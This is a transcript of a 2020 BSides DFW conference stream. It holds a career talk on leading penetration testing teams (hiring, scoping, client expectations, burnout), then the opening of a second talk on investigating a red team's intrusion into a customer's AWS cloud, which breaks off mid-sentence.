← All talks

Managing Misfits: Lessons Learned from a Decade of Leading Penetration Testing Teams

BSides Dallas/Fort Worth · 2020 · 6:27:25 · 144 views · Published 2020-11 · Watch on YouTube ↗
Category: Career
Team: Red
Style: Talk

Welcome, everyone, to Managing Misfits: Lessons Learned from a Decade of Leading Penetration Testing Teams, or our original working title, Managing Misfits: An Epic Meme Adventure. Let's dive right in. The things we wanted to talk about today: first, Chrissy and I will give a quick intro of who we are and how we got here. We'll talk a bit about building a penetration testing team for success.

We'll talk about some of the epic battles that you might have with the business, and that could be your clients if you're in consulting or your business partners if you're an industry tester or a red teamer for a large organization. Next, we'll talk about managing misfits or managing a team. And last, we'll open it up for some questions. So let's jump right in, Chrissy, with your intro.

Thank you, Nick. Thank you everyone for being here. It's a privilege to be able to speak to you all and share some of the insights that we've got here. So a little bit about me. My name is Chrissy Safi. I am a managing director, and I'm also the global practice leader for our attack and penetration testing practice at Protiviti. I currently live in the Denver area, and some of my hobbies include things that you find commonly here in Colorado. We really enjoy camping, hiking, adventuring. I love to travel. I love food. I went to culinary school, so I like to call myself a chef. I also find myself momming from time to time. I've got a three-year-old and a four-year-old.

And then I'm married to a really great, supportive husband who is totally on board with my obsession with various gadgets. It's fun. So how I got here. I've had kind of an interesting journey, not your traditional journey in the cybersecurity space. I've been in the industry for almost two decades now, and I really did start my journey as a hacker. When I describe to people how I got to where I am, it dates back to when I was a kid. So I'm most famous for circumventing my parents' rules. However, I always did it as stealthily as I could. I didn't want to get caught. I thought their rules were dumb anyway, but the

punishments were pretty bad. So, you know, whether it was figuring out how to make long distance phone calls for free or how to stay on the internet all night long without America Online charging us, things like that. But I never really thought about how that could morph into a career. So fast forward a few years: I went to the University of Colorado at Boulder. I started my college career as a math major, then became a biology major, and that was hard. Somehow, though, I stumbled into a pen testing internship with IBM, and they promised me that if I got an undergrad degree in anything I wanted, they would hire me. And so naturally, I got my degree in Italian. I did study abroad in Italy

and I spoke a little Italian just for the fun of it, but it was my quickest way out of school. And IBM held up their end of the commitment and hired me. I started as a pen tester working on various client engagements, doing a lot of internal penetration testing. Overall, I spent about 10 years during that period with IBM in various cybersecurity roles. I became a security advisor for major Fortune 50 and Fortune 100 companies that had outsourced their security. I was an offering manager. I did a lot of different things, and then somewhere along the way I decided I needed a change of scenery from Colorado, so I moved to Washington, DC. I got my MBA

at the University of Maryland. I went to culinary school shortly after that, and then, I think it's a rite of passage when you live in the DC area that you have to work for the government for at least part of the time. So I went down that path and got a job with the US government. I traveled the world for a few years doing infrastructure security at embassies, probably one of the coolest jobs I've ever had. But then I was recruited back to IBM Security to help launch what is known today as IBM X-Force Red. That was a few years in the making. I wore a lot of different hats, from offering manager to route-to-market leader, and left that position

running the Americas and Japan for them. And then in April, I was recruited to Protiviti to become the global practice leader for the penetration testing practice. And so here we are. Yeah, in the future, I'm gonna have to go first, because my story isn't nearly as cool as that, but I'll try my best. So again, great to meet everyone virtually. What a weird situation to be in, having to be kind of at home and virtual, but I'm glad we could still have the conference. This is great. So a bit about me. My name is Nick Britton. I'm an associate director at Protiviti. First and foremost, I'm a proud Texan. Despite growing up in a military family where I moved every two to three years

and kind of found myself in a lot of weird places, we always found a way back to Texas. And I've been here since really high school, and now it's absolutely 100% home for me. I like to describe myself as the world's OK-est penetration tester. That is my background. I was a penetration tester by trade for a number of years, and I lead the team. But as I've grown in my career, I've realized that compared to the people we have on the team now, I'm certainly just one of the OK-est. I am not the best, and I've got so much to learn despite leading that team. One of the things I am exceptional at, however, is just buying stuff on Amazon. So, you know, while pen

testing is, you know, there's a lot of room to grow there, Amazon I've got figured out. So if you need tips on that, certainly let me know. A bit about how I got here. So similar to Chrissy, my career in pen testing, or kind of that whole mindset, really started early as well. I was a professional, quote unquote, gamer in high school. The e-sports world didn't really exist back then, so I put professional in quotes because I just found a few online retailers that would give me free stuff or free swag for putting their company name in my handle on Counter-Strike. But it really was that type of thing that got me

interested in building my own computers, spending a lot of time on IRC, finding games, things like that. And that really led to spending a lot of time

looking at how to hack games and how to hack different things, because you're in that kind of culture. And that's really when I started to fall in love with the security community and just the computer community in general. I ended up going to Baylor for undergrad, found my way into the business school somehow, and landed at Protiviti right out of school. I actually spent a few years as a project manager and realized that was absolutely not what I wanted to do. I respect great project managers. It's a hell of a trade, but for me, I wanted to be down in the weeds in the technology of security. And that really started when I attended BSides Las Vegas for the first time. And I just

fell in love with the community and realized that pen testing was my passion and something I wanted to do. And I was really fortunate that Protiviti kind of gambled on me and gave me the opportunity to jump into the pen testing space. I was absolutely carried through the first few years of offensive security by the people around me on my team, by the community, by everyone that publishes open source tools and articles. I had no idea what I was doing starting out, and I was just absolutely carried through it. Since that time, I've developed a pen testing practice for Protiviti in Dallas, and we've built an absolutely amazing team that we'll kind of

talk about as we go here. And my role has really transitioned now out of just thinking about Dallas and really thinking globally with Chrissy, and I'm now the practice development lead for attack and penetration at Protiviti. I'm super excited at the rate we're growing, and I'm excited to talk about kind of the techniques that we've used to grow the team and how you might be able to leverage some of those yourself.

Awesome, thanks, Nick. Alright, so enough about us. Let's just jump in and get to the part that you really want to hear about. So this next section that we're going to go through focuses on building out a team. And I'm going to specifically talk about hiring and kind of the structure of the team that we've built. Alright, so how to conduct a meaningful interview. So let me just start by saying this, I do not have the technical chops to go toe to toe with the very technical candidates or the recruits that we're going after. But I've got a whole team of people that can do that and we've built the trust and that structure there, but I let them run with

that part. And I really focus more on the emotional intelligence aspects of the candidates. So really, who is the person, what are their behaviors, things like that. I usually gear my questions around things like, you know, could I see myself working with this person? Would others want to work with this person, others on my team? Will this person be a culture add to our team? And I don't mean just a culture fit, you hear that often, but I'm looking for adds. So, you know, what are their extracurriculars? What are their interests and their passions and their backgrounds? What kind of diverse perspectives can they add to our culture to make us even better?

What is the person's emotional quotient? So what's their EQ score? What does that look like? So I look at things like, you know, how do they present themselves both verbally and physically during the interview? So, you know, are they on time? Are they dressed appropriately? How do they articulate their thoughts? Are they self-aware? Are they prepared for the interview? Things like that. I also like to leave time at the end of an interview for questions. I like to kind of hear, you know, what are they thinking? How does what I'm saying resonate? And, you know, one of the things I keep in mind too is, you know, how are the questions that I'm asking of them received by them? So, for example, you know,

asking a simple question, you know, like what side projects are you working on? You know, that could be interpreted as, you know, maybe this person is trying to get insight into what my life circumstances are, when really in fact all I'm trying to figure out is, you know, what are your passions? What are your interests? So like another way that we look at phrasing something like this is, you know, if you had 20% of your time at work to dedicate to a project of your choosing, what would it be? And I think that really gets to, you know, the pieces of information that I'm looking for to see if this person is gonna be a

good fit or not. So next I just wanna share with you some insights into what I look for, and what I avoid, when hiring as well. So, you know, you can look at the list here, kind of the things I call winning and the red flags. A lot of them are really obvious, right? You know, having that confidence, being prepared for the interview, being enthusiastic, things like that. But there are a few that I do want to point out that maybe you haven't thought about. We see some of these traps sometimes, so take note of some of these and consider them for the next interview that

you might be going through. Maybe it'll be with me. So what I look for is OSINT, Open Source Intelligence gathering. What has the candidate done to research the company, research the job, research the team, research me? That helps show that there's an interest and an understanding. They didn't just get caught up in the title of the job post, for example: ooh, it says pen tester, this will be great. Really dig in and try to get an understanding of the business that the potential employer is in and the team that you'd be working for. I touched on asking questions. I love seeing questions; it shows you're engaged. Honesty, you'll see that as a theme actually throughout this presentation. We value honesty here in

my team and at Protiviti. Have ideas, and notice that I didn't say have good ideas. I like ideas, any ideas. We can work with those; it shows that somebody's thinking, and maybe it morphs into something else that becomes some really great idea that we spin up into a new thing, a new tool, a new offering, I don't know. I also like disruptors. Now, I put in parentheses there, with tact. Okay, I like disruptors that want to challenge the status quo, but do it in a tactful and respectful way. I hate hearing, you know, well, this is just how we've always done it, or the way I've always done it is the best way to do it, and kind of

being closed-minded about new ideas and things like that. So, from a red flag perspective, again, a lot of obvious things here, but one of the traps that I've seen is kind of this victim mentality, if you will. So, you know, kind of blaming everything on somebody else: my previous boss hated me, or my old company was out to get me, or I was ignored for promotions, those kinds of things. I like to see people that really take ownership, and even take ownership of their mistakes. Kind of goes back to the honesty aspect. I don't really like to hear gossip about previous bosses or employers or colleagues, things like that. It kind of sends a message of, you know, if this doesn't work out,

are you going to go do that to us as well? Yeah, those I think are the highlights there. And yeah, just keep these things in mind. They really do help during the interview process, especially when you're interviewing with kind of a leader of the practice versus somebody from a technical perspective. So next I wanna get into team structure a little bit. When I think about building out a team, and kind of what I've done here at Protiviti and in the past, I focus on things like depth and breadth, okay? And I don't mean just depth and breadth of skills. I mean things like diversity: diversity of the people, of the backgrounds, of people's aspirations, of people's interests, things like

that. And I like to make sure that it is visible to my team what opportunities are available for growth. A lot of people have different things that motivate them, they have different aspirations in their career. So making that known. So maybe they wanna pursue a technical track, maybe they want to get into leadership or in business development, project management. I guess Nick's not gonna be into the project management route, but operations. So I really subscribe to the model of you gotta see it to be it. So I make sure that these kinds of opportunities are known. And then from an engagement perspective, the teaming structure, we do a lot of deliberate pairing of testers on our projects. So we try to run with at least two

people on a test of varying skill sets. Some are specialized, unique skill sets; some are maybe folks newer to the practice, and we use it as an opportunity to really do a lot of cross collaboration and cross training. I do believe in scaling up our internal team versus, you know, just recruiting from outside to fill a specific gap, if it's possible. And then the question that I think we're all debating right now: remote, to be or not to be. I've actually worked most of my career remotely, so I have a lot of very pro-remote things to say, and I think it can be done successfully. Nick comes from an environment of being on site, and that certainly has its pros and such. And COVID

is really kind of testing how we can all operate in a productive and collaborative way. So a lot more to say on that. When we get to the Q&A piece, if anyone has questions or specific insights around that, I'm always happy to answer that. Yeah. You're absolutely right, Chrissy. And COVID's tested my, you know, kind of theory that you have to be on site. And I know you laugh because you heard it right when you started. And, you know, I love being on site, but there's so much you can do now virtually. And I'm learning that you don't necessarily have to be face-to-face with somebody to learn from them and teach them and, you know, be successful. So it's been an

interesting year. So next, we're going to jump into our next section, which is battling the business: some common challenges and issues facing teams pre-engagement as well as during the engagement. And ideally, right, we say battling the business, but in a perfect world, it's the SpongeBob rainbow partnership, right? A pen test is wanted by the client or the organization that you're hitting. They want your findings. They're receptive to it. The scope is whatever you want it to be. Everything goes well, and it's just amazing. But in reality, right, that's probably not it. And I feel like this sums up the majority of my day. I'm having difficult client conversations because they don't like the way the findings are positioned. The scope isn't what

we want. The budget. There's so many things. And of course, during those conversations, I'm nice SpongeBob. But I have to kind of stew over those things, because I would love it to be perfect. And then, of course, when I describe the conversations to my wife, I'm Hulk SpongeBob and portray it as if I just told them exactly how it was going to be. But that's never actually the case. And so there's really three things that we think of, three battles that we fight, and I wanted to give you some tips on how Chrissy and I handle them, even though we sometimes handle them differently, day

in and day out. And first is foundational, it's fundamental, it's scope. And you're probably rolling your eyes already at home because this is something everyone has to deal with always. Scoping assessments is so important and it's getting harder because pen testing is becoming more commoditized. Every day you're hearing about some artificial intelligence or some machine learning program that's going to automate all of the pen testing jobs. And you're just going to click a button and it's going to run a red team, quote unquote, scan, right? Well, we all know that's not the case. Like there has to be a human element because there's a human element on the other side, right? So you have to be able to talk through that with your

clients during the scoping process to ensure that you're on the same page. And that's where we'll start, right? Ensure you're speaking the same language. So the first thing I do with a client, if it's the first time we've talked, is make them define pen testing to me, if that's what they're asking for. And I say, I know what I think pen testing is, but what does it mean to you? Do you see it as automated scanning, a vulnerability scan? Do you see it as threat emulation? Where in kind of the maturity level do you see it? And what do you really want? And once you get that understanding of what they're actually looking for, you can start actually building out the test and

the program that they're looking for without even worrying about the language and what you're calling things. Next is not everyone needs a Cadillac. This was really tough for me as I transitioned from a pen testing role where all I wanted to do was deep multi-month red team engagements into leadership where I was having conversations with clients and scoping engagements. If you're a hammer, everything looks like a nail, right? So I wanted to do red team assessments. So all I told clients they should do was red team assessments. Well, small businesses, businesses that aren't necessarily in a secure posture yet, they don't need a full red team assessment. Some of them just need a VA scan. Some of them just need

a basic net pen to identify some of the low-hanging fruit so that they can build their posture and eventually get to a more mature state. And that was tough for me for a long time, but you gotta remember, some people don't need that Cadillac red team with physical, social engineering, and the works, right? And I think that goes really well with my last point here: you gotta work through scope restrictions. And we could probably have a whole talk on scope restrictions, right? I'm sure there's memes and GIFs galore on Reddit about scope restrictions and pen testing. You know, this happens all the time, but you have to be somewhat understanding of the position that you're putting the business in. It's not always your

point of contact's decision on what the scope can be. You know, we are here to support the business, and there will be times when, you know, that system that they know is vulnerable is going to be out of scope. Not everything needs to be a red team. Not everything needs to be in scope every time. Sometimes it goes back to understanding what they need to make sure that you can still give them a good test without just kind of barreling through the scope and making the claim that if not everything's in scope, it's not a real test. Maybe an unpopular opinion, but I'll say it. So battle number two is all about expectations. So you've scoped your assessment, you are already

started, and you're proactively managing expectations with the client by defining scope, ensuring you're on the same page, you're using the same lingo, you have a common understanding. But now you need to figure out what they want, and apparently Chrissy's never seen this meme. So for anyone who hasn't seen any movies for the last 10 years: Noah is trying to get back with the woman he wants, and he's just continuously saying, what do you want? What do you want? Kind of berating her with it. So probably don't do that to your business partners. But I think it's important to continuously ask through the process what they're looking for out of the test. And it can be hard to drag out of some people, like,

what are your actual goals and objectives with this pen test? Is it just to check a box? Is it to get more security budget? Is it to test some changes that you've made to your network? Keep asking until you get to the real problem of why they're having a pen test or why they're asking for a pen test. Because you can start to get some really great information that can really drive the way you approach the test and drive the approach you use. And sometimes it takes a few times going through it for someone to really understand why they want a pen test. Sometimes it's a battle for them as well.

Oh yes, battle number three. So when it all goes wrong, Kermit says, oh no. This is taboo to talk about, right? This is the thing that no one wants to say. It's uncomfortable for me to talk about, because I think we all just pretend it doesn't happen. But in reality, like I said, this is a human-centric practice. Pen testing is not artificial intelligence that just does everything right every time. It's human-centric, and it has to be. And so with that, things will inevitably go wrong sometimes. First, we're doing something that's inherently risky, and we're targeting things on a network that is typically in production. And eventually, if you do this for long enough, you or one

of your testers is going to break something. For example, maybe a bank's app that controls mobile banking. Just an example. And it's really important to tell your testers, and instill a culture in your organization, not that you encourage that, but that it's okay that these things happen from time to time. A, because you want your testers to be able to come to you and tell you immediately if something's happened and not be scared of ramifications. If you scare your testers, they're either going to try to sweep it under the rug, and it's going to get caught anyway and you're going to be in a terrible position, or, and I think even worse, your testers are going

to be scared to do things that are risky. They're going to be scared to push the envelope and try new attack techniques. And we have to manage that. But at the end of the day, I tell my guys and girls, the relationship we should have is: you should come to me with crazy ideas that you wanna execute on a network or on an application, and it's my job to manage the risk. I want you to be brainstorming and thinking of new things and pushing kind of the boundaries of what we can do. And I think it's important to have that relationship and that culture in a team, because you want the team

to constantly expand their skillsets. And the second thing that goes wrong: you know, you're going to have clients that say you missed something. You did a test a year ago, and you didn't catch this. And I think it's important that we start talking about this more openly, really as an industry and as a community: it's not a silver bullet. Pen testing is human-centric; it's a point-in-time assessment. There's a lot of variables in any test, and you are not going to find every single vulnerability on any test. And I think it's taboo to say that to a client or to

a business partner. And so they have this maybe expectation that you're finding every single thing. And Chrissy mentioned it earlier, we need to be honest about what clients are getting and tell them, we have these capabilities, here's what our team does, maybe write the narrative of all the things you tried. But at the end of the day, there's limitless possibilities of ways to attack your network or your application. So there's always the possibility that there's more out there. That's why it's important to build a program around testing and not just have one a year, one every five years, or whatever it might be. So we'll wrap up a little bit on the battles we have with the business, and we'll

switch to our namesake, managing misfits. And spoiler alert, we're all misfits here. I think you kind of have to be to be in security. It comes with a certain mindset, and it's what makes us successful. And so we'll talk a little bit about embracing that as we go. I looked up the definition and I only stole part of it because after this part, it gets kind of unflattering, but this is the part I decided to focus on because I think this is what really matters to me. You know, a misfit is a person whose behavior or attitude sets them apart from others. And I think that's exactly right, especially in pen testing. So if you look at our team and me and Chrissy, you know, I

think we do have a different attitude or mindset than most. And I think it's the curiosity and the competition that makes us successful in the things that we do and makes us so good at security. We're always kind of poking and prodding at different things, whether it's trying to get free long distance calls or hack Counter-Strike for better gaming purposes. So with a team of misfits is going to come a lot of unique personalities, and that might be an understatement. And I kind of put this statistic together, and my thought is: people management is 40% organization, 30% leadership, 15% preparation, and like 80 to 90% awkward conversations. And if you're in leadership, you probably have a giant smile

right now. If you're not yet and you want to get into leadership, be prepared. When I got into management, I was not, and I was flabbergasted by the number of awkward conversations that I had to have on a daily basis. You get better at it, but I don't think it's something you can really prepare for. If you're gonna be leading a team, you're gonna have to have conversations that are going to be weird: about performance, about other people's careers, about their goals and aspirations in life, about their feelings, about hiring and firing decisions. And it is awkward, but you have to be willing to embrace that. If you ignore those things, you will not be a successful leader, and your team will not be successful as a

group, because they'll feel like they have to kind of hold all that in. And so open and honest communication, even awkward communication, is essential, especially in something like pen testing where there's so many variables and so much going on. And I stole a quote from General McChrystal. If you don't know him, you should look him up. Absolutely amazing leader. He has some great YouTube videos, but he mentioned that great leaders can let you fail yet not let you be a failure. And I think this ties back really well to when things go wrong. So it's important to instill in your team the culture that failing on an individual project is not necessarily a bad thing. And just because you haven't succeeded in a daily

task or a project or something doesn't mean you as a person are a failure. It just means that you dropped the ball on something, and it's something to learn from, right? So we have to instill that culture to keep everyone driving forward.

And then this is my wonderful Microsoft Paint work. As you can probably tell, it looks very professional. Excuse me. I won't spend a ton of time here. This is something that I've drawn on the whiteboard in my office a number of times for new consultants when we talk about what their development plan looks like. And I view it kind of as an hourglass. So it starts broad: we want people to have a lot of experiences as young consultants, and we want people that are getting into the industry, regardless of kind of how they got here, to get a lot of different experiences and exposure

to a lot of different things. People will inevitably come in and tell you exactly what they want to specialize in on day one. That's great, but you can't tell what you want to specialize in until you've had some of those experiences. And so push your team, as they come in and they're new to the industry, to get a broad-strokes sample of all the different things that you offer. And what will happen is, as they progress in their career, they will gain expertise in a single area and start to specialize. And then they will eventually broaden back out, potentially, or not. Maybe they'll stay that expert in a specific area. But a lot of people kind of broaden back out. And that's kind of where Chrissy and I

are at: kind of getting out of the way of the people that have super specific expertise below us and letting them do their jobs.

Exactly. Thanks, Nick. And then something, no matter where you are in that hourglass, something we're all dealing with right now is burnout. So I want to talk about that for a minute. But first, some statistics, because I really do like numbers. In a recent survey, 63% of organizations said they are experiencing a shortage of IT staff dedicated to cybersecurity. I know you all know that, and that is a very big number. And we are all working towards closing that cybersecurity skills gap. I feel very fortunate to work for Protiviti, which is a subsidiary of Robert Half. We have the ability to reach into Robert Half to help

fill some of these needs so that we can avoid some of the burnout that even our clients' staff is feeling right now.

57% of workers in the tech industry are currently suffering from burnout. So you're not alone. 65% of SOC professionals say stress has caused them to think about quitting. And 91%, this just seemed really high to me, of CISOs say they suffer from moderate or high stress. Might need to rethink my own career path. I kind of always thought I wanted to be a CISO, but 91% suffer from stress. But yeah, I mean, we're all feeling it right now, especially with the times that we're in: with COVID, with politics, the social inequality issues that we're hearing about every day, the natural disasters. You know, here in Colorado, we've been battling fires this summer. So there's just a

lot going on. It all contributes to that stress and kind of that overall burnout. So again, you're not alone, but you know, really, how do you avoid it?

I don't know. Just kidding. I really do wish there were a silver bullet for this. What I've learned through the years is that different things work for different people. Some people are good at things like setting boundaries and sticking to them, taking vacation. Some people aren't as good at it. Specifically Nick, he's pretty terrible at it. I'm not sure when he actually even sleeps. But as a leader, I try to reinforce that we need to take that time, we need to set some boundaries. I personally set boundaries, I communicate them with my team and with my leadership, and I try to set an example that that's

okay. It's okay to say that, for me, between 5:30 and 8:00 is when I spend time with my family. That's when we make dinner, bathe children, read stories. They go to bed at eight, and after that is kind of a free-for-all. It's either time for me to get some self-care, or maybe my husband and I will watch a show or just catch up on the day or plans for the weekend. But between the hours of 5:30 and 8:00, I'm really pretty good about sticking to not looking at my phone, not looking at my emails, things like that, because that is kind of the only time

that I really get to disconnect from the craziness that is cybersecurity and the world we're all in. So again, there's not a magic bullet, but this is my advice: try to set those boundaries, communicate your needs, and disconnect when you can. Even though I say to just do it, it's hard to do. For me, too: when I go on vacation, I do take vacation, I'm really good at it actually, but I make sure, for my own stress levels, that I check in periodically, every day or two. I just open up the email and see if there are any fires burning or any escalations, things like that. But I've also built a really strong team

under me, so I can trust them to handle things. But for me, it helps just to check that email, because then I don't come back to a pile of mail and have that thought that no good vacation goes unpunished. A lot of companies have wellness programs available. I've seen some cool things around exercise platforms and mindfulness sessions, and I've recently been seeing some guides for healthier meal planning. The list goes on. But again, different things for different people, and it's easier said than done to really take that time. Now, there are some things that your company can do. These are things that I instill within my practice, and Protiviti certainly does as a company: things like

genuinely supporting the needs of the people. So, being flexible with work schedules. Some of the things that we're doing: we've got parents in our organization who are now teachers, homeschooling their kids. If they need to shift their work schedule because between 10 and 12 they have to teach math, then that's a time when we're not going to have meetings, and our clients are respecting that as well, shifting those meetings to a different time to support the parents in those positions. We also try to do no-video Fridays, because now, with everybody being remote, I swear we all used to be fine with the phone and just talking via audio, and suddenly there's

this influx of everyone needing to be on video, and we all have Zoom fatigue and so on. So we set aside Fridays, or whatever time is okay, to not get on video. Go take a walk while you're on this call. We also do different types of recognition and training, realizing that different things motivate people differently. Try to get out of that whack-a-mole mode, that knee-jerk reaction to everything, quick, quick, everything's a crisis. Let's get a strategy and a plan together so that we can avoid that burnout as much as possible. We're also looking at different technologies that we can implement to reduce workloads, different automation techniques to free up some time

for our people to focus on the more interesting things and get away from some of the mundane tasks. So I wish I had the answer and the silver bullet, but hopefully some of these suggestions will help you and your company as we all get through this crazy time. All right. So, hope you feel so much smarter and wiser, and you're ready to go start your own pen testing practice. Really, just some of the key takeaways we want to leave you with, the things that resonate and bubble to the top for us, the big priorities here: when you're hiring, hire for potential. Don't just look

at current skill sets. You can upskill people if they have the right attitude and the right passion. We need that diversity and those diverse backgrounds that sometimes you can only get when you look at people from that perspective. The team structure is critical. It's critical for employee engagement, for people to be able to see their potential future, what leadership roles, technical roles, or other roles they could move into. It really helps people stay engaged, be productive, and contribute to the team, to themselves, and to the organization. Communication is key, key to managing all the things, whether it's communicating expectations with your clients, with testers, with others in your organization, even about,

you know, any special flexible work schedules you might need. Really, communication is key. And embrace the inner and outer misfit. We love you all. I love this space, personally. I love the personalities and the mindset that this particular space, and cybersecurity in general, brings, and I just want to give everybody a big virtual hug. And then again, yeah, no silver bullet for avoiding burnout. Sorry. But thank you for being here. We really appreciate your time. And over to you, Nick. Yeah, thanks, Chrissy. Thank everyone for joining. We're asynchronous now, so I believe we're going to have a forum for questions, but if not, feel free to reach out to Chrissy or myself on Twitter, LinkedIn, anywhere you

can find us and we're happy to chat. We look forward to talking to everybody. Thanks. Thank you.

All right, hello everyone, and welcome to my talk, Chasing a Red Team from the Dressing Room into the Cloud. My name's Tyler Fornes. I'm a Principal Detection and Response Analyst at Expel, which is a managed security provider. We cover a lot of different technologies and a lot of different things, but we're going to talk about that later. What I really want to share with you today is an interesting investigation that we did involving AWS specifically, where we chased a red team, literally, yes, from the dressing room all the way into our customer's AWS cloud. A little bit about myself before we jump into the technical details. Being a Principal Detection and Response Analyst

at Expel, I get to see a lot of really cool incidents and investigations, all the way from the enterprise, your traditional EDR, MSSP-style alerting, to a lot of really cool stuff that we see in AWS, GCP, and Azure. I lead our global response team, which is the team that comes in at the end, when we have a critical incident, where we're running down active attackers, performing live remediation actions and live resilience actions, and doing a lot of the technical work that tells us the who, what, where, when, and why of a breach. Before I jumped to Expel about three years ago, I worked at Mandiant FireEye, where I spent a little bit of time running

down targeted activity, as well as doing a lot of network and Windows-based incident response, which was a lot of fun. But enough about me. There are a few things I want you to take away from this presentation. We're going to talk a lot about AWS, a lot about what attackers do in AWS, but I really want to share with you our investigative process, how we actually respond to something from a blue team perspective in the cloud. On the flip side of that, talking about some of the tools is really cool, but what I really want to talk about is

how attackers abuse AWS. A lot of people are moving into the cloud, making the transition from on-prem infrastructure to all of these big scary acronyms that exist across the three big cloud providers. But I really want to talk about what an attacker sees when they see some of these services running, and how they're thinking about using them to get inside your environment. And last but not least, this is a really cool red-versus-blue engagement, which highlights the importance of purple teaming, which I know is one of those words that floats around our industry a lot. But I really

think that this is a good example of what it looks like when a red and a blue team work together for the common goal of making a customer more secure, and I think that's really powerful. Now, some background about what I mean when I talk about full cloud compromise. Full cloud compromise looks like this. What you're seeing here is a diagram I made of the entire engagement that the red team went through to compromise this customer. You'll see that it's not all in AWS. There were some aspects of this investigation, specifically in the initial access phase, where the red team actually had to go to a storefront to be able to work their

way to the cloud. And I think that's really powerful, because when we think about how to protect the cloud, we usually think about the border, the gatekeepers of the cloud, meaning API endpoints, console access, and things like that. But what happens when an attacker makes it into another part of your environment and uses those things, and the reconnaissance they gain from being on your systems, against you to get in from the inside? That's really, to me, what full cloud compromise looks like. It's not just someone going out on a GitHub page and scraping an API key, or an opportunistic attack where they come across

some access key in your code. It's really being able to use the information they've gained in a breach against you, to not only get into your AWS infrastructure, but to gain master control once they get to that root console access. We're going to take a look at a few specific things, but mostly what we're going to talk about is how an attacker can use the AWS API remotely to get some of this access, and what it looks like when they're able to delegate a role or escalate their privileges into an AWS console user, meaning they likely have root access or some way of getting to that account. Then we're going to talk about role delegation and impersonation, two-factor

bypass, and we're going to talk about what it looks like when an attacker has full control of all these services. I'm going to share with you some really clever things that the red team did once they had this level of access, things that were really surprising to us and actually led to us creating some really, really powerful detections that we've been able to use not only at this customer, but across our entire customer base, and even, down the road, to contribute some of them back to the MITRE ATT&CK framework, which was really cool. So really, what this looks like on the red team side is pretty easy to see. But

what a blue team starts to see when they start detecting compromise might not be as obvious. As you can see right here, these are sanitized versions of some of the alerts we started to see when we detected this breach by the red team at one of our customers. You'll see here I have two alerts, one for suspicious access key generation and one for suspicious SSH key pair generation. Both of these alerts started coming in around the same time. At face value, they kind of mean one thing: we know that someone's trying to get in, or, in the case of the access key generation, someone may have already gotten in. But that doesn't really answer all of the investigative

questions that we ask ourselves as blue teamers when we're running down a breach. Really, we want to know the who, what, where, and why, because if I'm seeing SSH key pairs being generated against AWS, that means someone has already been given access and is already in. And that's where the really sexy investigation starts to happen. I'm going to share with you how we cut up CloudTrail and GuardDuty specifically, so that we can get the answers to some of these questions really easily and start telling the whole story of the breach. Now, at the end of this, this is actually what our findings report looks like in our tool that

we use to communicate with our customers. You'll see a lot of this is redacted, but what you're supposed to take away from this slide is that there's a lot that goes into solving this breach, and a lot of information and IOCs that are gleaned. Alerting will get you halfway there, but it isn't going to tell the whole story. It's what you can do with some of the data that AWS gives you by default that's going to allow you to generate a findings report where you can tell the entire story of a breach, meaning: how did the attacker get in? What did they do once they got in? And

what were the resultant activities of their access, what was the goal they were trying to get to, what was it they were actually trying to unlock, right? And that's really what we're going to get to at the end, and I'll show you some cool things that they ended up doing. So, a little bit about what we protect and a little bit about this customer's background before we jump into the story itself. This customer is a major organization. They have a lot of different retail stores, a lot of different headquarters, a lot of different apps that communicate, as well as a lot of

different big warehouses around the globe that all communicate with each other over a network. And what this is all backended into is a large AWS cloud footprint, meaning everything and anything that this customer does, they've developed to run on AWS. A lot of the tools and things that they use every day, and a lot of the things that their customers use, all go back into the cloud and are cloud-resident. So for us, what that means is that we're going to have to use a lot of their tooling to start piecing together what exactly happens if an attacker gets in. Because more than likely, the thing

that an attacker is looking for isn't going to be in the storefront, and may not even be at the headquarters or in the warehouse. It's likely going to be at the back end of what is driving this organization, in this case, AWS. A few of the tools we're going to use to get there: we're going to use GuardDuty for a lot of our alerting, and we're going to talk specifically about which alerts in GuardDuty are really beneficial, and maybe some places where we can augment them and make them a little better. But there's also going to be a significant lift from EDR products and network visibility as well. Because if the

attacker starts moving between the cloud and the enterprise, or vice versa, we're going to want to be able to tell that story, and we're going to want to use those tools in tandem to solve this cloud breach. Now, when we start talking about why the customer hired this red team, it was because they wanted to simulate what an advanced adversary would do if they were targeting this customer specifically. That meant the customer gave this red team full scope. That's really cool, because it means the red team can be creative, and they can use a lot of tooling and things that we have maybe never seen

before. That's really good for the customer, and that's really good for us as a blue team, because cloud is new. Cloud is something that only a few people have been doing for more than five years. Especially from the blue team perspective, we really don't have a lot of case studies about what an attacker does in the cloud. If we let a lot of really smart technical people go throw a bunch of exploits and move around however they want in the cloud, we're going to learn a lot about how the cloud works, which is really cool on our end. But that's also scary for a customer, because it means the red

team has the ability to mess with production infrastructure. This customer was comfortable with that, because they wanted to know what would actually be useful to an attacker who got into their environment. Now, the second big thing to take away before we start talking about the actual story is that we were left in the dark. As their blue team, as their managed security provider, we didn't know that this red team had been hired, and we definitely didn't know anything about the scope of the engagement. Meaning, this was just picked up in our SOC one day. Our analysts spotted it from alerting that we had created for AWS, and we started digging in to

see the technical details. Now, full disclosure: we didn't detect all of it, and that's okay. We learned a lot from this, and that's the point of having a red team in your environment. It isn't to detect all the things, it's to get better. And that's really what I want to highlight in this whole scenario: we learned a lot from this, and I hope you do too. And lastly, you can see at the bottom, I left this snarky comment: customers love to leave us in the dark, especially during proofs of concept. It's kind of the, well, you say you can detect a lot of things, but can you really? And we

love that, because it's really challenging for us, and it's really cool to be able to think outside the box about new detections and ways in which we can augment all of this technology. So we really love this situation, and this is one of those where we actually won this customer over in terms of how we were able to respond and use these tools. Enough about that. Let's jump into the story. So, where did this all start? Where this started for us is actually a CrowdStrike alert. So this didn't even start in the cloud. What I have listed out here on the left-hand side is how we think about doing blue

teaming at Expel. Meaning, every time we have an alert that comes in, and every time we're looking at an investigation or an incident, we train our analysts to think in this mindset. We're not big fans of runbooks, especially when they're stapled onto technology. We really like to train our analysts in how to think. And if we can teach them to answer these five basic investigative questions every time an alert comes up, we believe we can solve any particular breach. So over here on the right-hand side, you'll see I have a redacted screenshot of that CrowdStrike activity. Now, this CrowdStrike activity, when you look at

the actual alert that showed up in our console, you would see a suspicious file called a.py executing out of a temp directory on an OS X laptop. Now, why is that significant, and why is that something we're alerting on? Well, one of the really sketchy things about that Python file was that it matched a signature pretty closely to a known version of the Empire backdoor. Now, there's Empire, E-M-P-I-R-E, but there's also EmPyre, E-M-P-Y-R-E, which is a fork of that Windows project that gives you a cross-platform C2 framework using Python. So what we were actually seeing was a Python backdoor running on an OS X laptop. We know that's going to allow remote access to an OS X

